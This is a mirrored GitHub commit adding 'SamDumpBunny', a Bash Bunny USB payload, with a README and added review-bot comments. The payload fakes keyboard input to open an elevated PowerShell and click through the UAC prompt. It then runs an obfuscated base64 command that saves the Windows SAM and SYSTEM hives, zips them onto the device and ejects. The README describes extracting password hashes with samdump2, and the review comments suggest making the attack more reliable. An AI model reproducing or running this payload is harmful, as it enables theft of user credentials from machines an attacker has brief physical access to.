mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Uploaded SamDumpBunny
Dumps users sam & system hive, which can be used later to extract the users hashes
21
payloads/library/credentials/SamDumpBunny/README.md
Normal file
@@ -0,0 +1,21 @@
**Title: SamDumpBunny**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is SamDumpBunny?**
#
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**Instruction:**
1. Plug in your Bashbunny and wait a few seconds
2. Unzip the exfiltrated zip file onto your machine.
3. Use a tool like samdump2 on your machine to extract the users hashes.
> `samdump2 BunnySys BunnySam`

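Review bot: step 2 ("Unzip the exfiltrated zip file onto your machine") never says where the zip ends up; payload.txt in this same commit moves `SamDumpBunny.zip` into the Bunny's `loot` directory and is hardcoded to a German keyboard layout (`DUCKY_LANG de`, `Q ALT j` to answer the UAC prompt), so the README should state both, since step 1 will silently do nothing useful on another layout. Minor markup: the lone `#` after "**What is SamDumpBunny?**" renders as an empty heading, and the `<p>` opened on the Author line is never closed.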
53
payloads/library/credentials/SamDumpBunny/payload.txt
Normal file
@@ -0,0 +1,53 @@
#!/bin/bash
#
# Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
Q DELAY 250
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
Q DELAY 250
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
Q DELAY 250
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
Q DELAY 250
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
Q DELAY 250
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
Q DELAY 250
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH
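Review bot: `GET SWITCH_POSITION` is executed but `$SWITCH_POSITION` is never read anywhere in the file, so the call is dead; either drop it or branch on it. The layout dependency is only half-documented: `DUCKY_LANG de` and `Q ALT j` (with the comment "Needs to be adapted for your language") tie the payload to a German keyboard and a German UAC dialog, yet the `# Description:` header and the README in this commit do not say so. Finally, the tail of the typed command (`;mv SamDumpBunny.zip ...;New-Item -ItemType file \$bb'DONE';...InvokeVerb('Eject')`) runs unconditionally after the encoded block, so if `reg save` or `Compress-Archive` fails (UAC declined, elevated window not yet focused) the `DONE` marker is still written and the drive still ejected, and `LED FINISH` reports success with no loot; test that the zip exists before writing the marker.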